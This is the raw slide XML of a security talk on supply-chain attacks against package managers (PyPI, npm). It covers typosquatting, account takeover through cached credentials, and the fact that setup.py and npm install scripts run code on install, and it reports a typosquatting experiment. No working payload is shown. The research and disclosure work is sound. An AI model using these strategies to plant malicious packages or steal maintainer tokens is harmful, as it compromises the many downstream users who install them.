          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Package Manager </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pwnage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attack strategies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701" b="13148"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3559719" y="0"/>
            <a:ext cx="5133522" cy="33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Managers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Package manager </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Big collection of libraries for a programming language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A primary online repository serving all posted open-source libs (tools usually support private repos too)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLI tools to easily install a package with all dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every major programming language has one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pulling libraries from the package manager is a requirement for all but the simplest programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example, to use the popular python numerical calculation library “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>numpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” in your code, run:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“pip install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>numpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Installs can be run as user or root</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1932422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Managers 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329837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197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Managers Attack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789027" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>Atttack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>teh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> typos!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripters and developers install packages manually… usually by typing the install command by hand.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What happens if you mistake a letter (or drop a letter… or hit a neighboring key…)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packages are installed *without confirmation* in nearly all package managers!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07" y="2595351"/>
            <a:ext cx="3810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11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Managers Attack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094613" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Wrong manager attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developers frequently have to work in a lot of environments; with python and node and ruby and…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is easy to confuse install commands, forget which environment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: trying to install a python package using the ruby or node package manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even with a correct install command, it is easy to assume a package with the same name in a different repository does the same thing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some lazy developers may use a universal install script -&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So we would expect a package with the same name as a popular package in another repository would get installs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36" y="1914557"/>
            <a:ext cx="3451428" cy="3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1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Managers Attack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4"/>
            <a:ext cx="5929596" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Evil Repository Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Surely the repositories themselves are secure and trustworthy, right?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How are mirrors vetted?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are mirrors trusted by the package manager client?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How are packages verified?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is the connection between you and the package manager authenticated and encrypted?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66" y="1845734"/>
            <a:ext cx="4381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7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Managers Attack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01066"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Account takeovers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security and authentication for package maintainers is fairly abysmal across the board</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Package managers enable powerful and reliable post-exploit expansion of access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Development workflow for high-impact open-source developers exposes unique weaknesses that can be exploited to compromise their accounts and systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most widely used projects accept contributions via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pull requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pull requests let developers rapidly switch to patched branch via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>git</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PR’s save time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>when you open them on the same system you do your development from</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The same system you have your private SSH key etc. on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bug reports, troubleshooting code samples… means developers run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> untrusted code than others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But don’t developers review the code diffs before checking out the branch?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They do, but they don’t review the code of additional dependencies!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36331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758952"/>
            <a:ext cx="10664661" cy="3566160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Package Manager </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pwnage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Attacks applied to package managers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80" y="0"/>
            <a:ext cx="7772400" cy="327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87" y="2674523"/>
            <a:ext cx="4888326" cy="3111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"Supply Chain Attack Framework and Attack Patterns" John F. Miller, MITRE,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70" y="2213496"/>
            <a:ext cx="7141217" cy="40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23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514350"/>
            <a:ext cx="8636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08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Pip/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: The Python Package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Pip/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is one of the most commonly used package managers due to Python’s popularity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“pip” is the command line client, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” is the repository</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“Python Package Index”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Submitting a package requires an account on pypi.python.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How are packages uploaded?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How can targets be selected?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497" y="2172775"/>
            <a:ext cx="4224363" cy="42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31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PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 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an email. That’s it. All domains are allowed. Tor is allowed.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382" y="2360343"/>
            <a:ext cx="6993237" cy="384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04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PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Targeting popular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pypi-ranking.info site provides download counts for all packages. The most-used package has been downloaded over 180 million times!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9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2413762" y="2511135"/>
            <a:ext cx="7364476" cy="357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828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PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Submitting A Package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 package:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is an easy process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packages are small and can have as little as 2-3 small text files in them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once you are ready you run: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python setup.py upload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first time you run this, it will prompt you for the password you registered with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Package will be immediately visible on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and installable with “pip install”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2473261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PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Code Execution On Pip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029200" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code execution on a Python package is as trivial as creating the package</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All packages have a setup.py file in them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup.py is executed immediately on install</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add any python code to this file!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845734"/>
            <a:ext cx="5391150" cy="40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06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Post-Exploit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previously mentioned, pip upload asks for your password the first time it is run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why?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156653"/>
            <a:ext cx="99345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4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Pip: Post-Exploit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303520" cy="4301066"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you need to know why this is bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With these creds you can upload a malicious update to any package the account has rights over</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This malicious update will infect everyone installing the original package even without typos!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These are the keys to the kingdom for as many as hundreds of millions of systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2FA is nonexistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single arbitrary file read = owned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configuration file plausibly included in troubleshooting and debug outputs = owned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backup file accidentally left around = owned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forgot this credential file existed because it’s a hidden file? You know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203324"/>
            <a:ext cx="5542501" cy="330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542" y="19486"/>
            <a:ext cx="4353017" cy="6838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156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Pip/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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Created 2 packages similarly named to popular packages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packages depend on the original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Added code to ping a stat collector on install</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Re-read the CFAA 2 or 3 times to make sure no problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CFAA criminalizes accessing a computer without “authorization”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privesc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or touching any system but where package was requested = no “unauthorized” actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Court precedent implies as long as all your actions are documented, you are fine, but we went further</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No backdoor or arbitrary code execution = no “access”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No persistence, no extraction of creds or data files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, waited, and…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2128481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32" y="0"/>
            <a:ext cx="1228886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1" y="164161"/>
            <a:ext cx="12595748" cy="6836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PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> installs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3420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524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"Don’t Hassle The Hoff: Breaking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Code Signing" Charlie Miller, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SyScan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 2011</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Planted cover app on iOS App Store, implemented code signing bypass to dynamically load more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Published, then got banned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30" y="3250747"/>
            <a:ext cx="43053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25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Pip/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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142506" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A note on stats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pypi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ranking still thinks we have 0 downloads.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maybe they’re undercounting the other packages too?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I don’t know why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302" y="2017223"/>
            <a:ext cx="4312946" cy="368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6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8" y="470516"/>
            <a:ext cx="8595264" cy="52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0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NPM: The node.js Package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NPM is another of the most commonly used package managers due to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>node.js’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> popularity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stands for “Node Package Manager”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Submitting a package requires an account on https://www.npmjs.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How are packages uploaded?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How can targets be selected?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509" y="3575276"/>
            <a:ext cx="4532171" cy="21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71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109" y="2340429"/>
            <a:ext cx="5999109" cy="3899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NPM: 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an email. That’s it. All domains are allowed. Tor is allowed. Or use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adduser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Oh and it doesn’t verify the email.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25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NPM: Targeting popular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NPM features most popular packages on their homepage and each package has stats and collaborators. Most popular get millions of downloads per month!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46" y="2634343"/>
            <a:ext cx="7495820" cy="269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77" y="2319126"/>
            <a:ext cx="3343275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8267020" y="4970675"/>
            <a:ext cx="2779803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77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NPM: Submitting A Package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 package is similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyPI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This is an easy process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packages are small and can have as little as 2-3 small text files in them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once you are ready you run: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login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publish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You only need to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> login the first time if you didn’t use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adduser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npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> login will prompt you for the password you registered with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Package will be immediately visible on NPM and installable with “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> install”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1844843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NPM: Code Execution On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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029200" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code execution on a node.js package is as trivial as creating the package</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All packages have an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>install.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file in them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>package.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, simply set the scripts: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{ "scripts": { "preinstall" : "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node-pre-gyp",  "install" : "node-pre-gyp install --fallback-to-build" } ...}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Script commands will be executed immediately on install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914" y="1951156"/>
            <a:ext cx="4387623" cy="381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189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NPM: Post-Exploit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previously mentioned, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> login is a separate step.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because of course it caches an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> token nearly equivalent to your password. Again,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These are the keys to the kingdom for as many as hundreds of millions of systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single arbitrary file read = owned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configuration file plausibly included in troubleshooting and debug outputs = owned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forgot this credential file existed because it’s a hidden file? You know it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backup file accidentally left around = owned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2FA is nonexistent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663897"/>
            <a:ext cx="6324600" cy="13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6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candidates for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>typosquatting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> experiment, Adam Baldwin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641" y="2678059"/>
            <a:ext cx="5000772" cy="310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433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490537"/>
            <a:ext cx="47625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5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Flame malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Subverted Windows Update by intercepting update requests and inserting malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used groundbreaking cryptographic break to forge signatures</a:t>
            </a:r>
          </a:p>
